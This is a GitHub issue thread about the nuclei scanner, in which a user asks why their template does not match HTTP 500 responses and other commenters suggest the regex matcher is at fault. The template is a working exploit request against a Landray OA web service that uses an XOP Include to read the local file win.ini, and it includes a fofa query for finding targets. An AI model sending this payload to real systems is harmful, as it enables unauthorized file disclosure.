nuclei icon indicating copy to clipboard operation
nuclei copied to clipboard
verified publisher icon projectdiscovery

[BUG] ...How do the nuclei match the result with status code 500

Open ltfafei opened this issue 1 year ago • 2 comments

Is there an existing issue for this?

  • [x] I have searched the existing issues.

Current Behavior

I have a requirement to match a result with a status of 500

But the nuclei fail to do so

Image

nuclei POC:

id: test

info:
  name: test
  author: test
  severity: high
  metadata:
    fofasearch:  body="Com_Parameter"

variables:
  boundary: "{{to_lower(rand_base(20))}}"

http:
  - raw:
      - |
        POST /sys/webservice/thirdImSyncForKKWebService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/related; boundary=----{{boundary}}
        SOAPAction: ""

        ------{{boundary}}
        Content-Disposition: form-data; name="a"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.kk.im.third.kmss.landray.com/">
        <soapenv:Header/>
        <type><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:windows/win.ini"/></type>
        </arg0>
        </soapenv:Envelope>
        ------{{boundary}}--

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "<soapenv:Envelope"

      - type: status
        status:
          - 500

Image

Image

Expected Behavior

How do the nuclei match the result with status code 500

Steps To Reproduce

How do the nuclei match the result with status code 500

Relevant log output

Environment

- OS: 
- Nuclei: 
- Go:

Anything else?

No response

ltfafei avatar Dec 18 '24 07:12 ltfafei

I couldn't repro with a more straightforward example. Could you share the complete repro steps? If possible, the target as well -my discord handle @dogancanbakir.

dogancanbakir avatar Dec 18 '24 12:12 dogancanbakir

I don't think the response code matcher is the issue, but your regex matcher.

"<soapenv:Envelope"

That is your request. The response is without the env part. No?

I would also make it a simple text matcher, since you do not seem to use regex.

nf-works avatar Dec 19 '24 01:12 nf-works

This issue has been automatically marked as stale because it has not had recent activity. It will be closed in 7 days if no further activity occurs. Thank you for your contributions!

github-actions[bot] avatar Sep 07 '25 00:09 github-actions[bot]

This issue has been automatically closed due to inactivity. If you think this is a mistake or would like to continue the discussion, please comment or feel free to reopen it.

github-actions[bot] avatar Sep 14 '25 00:09 github-actions[bot]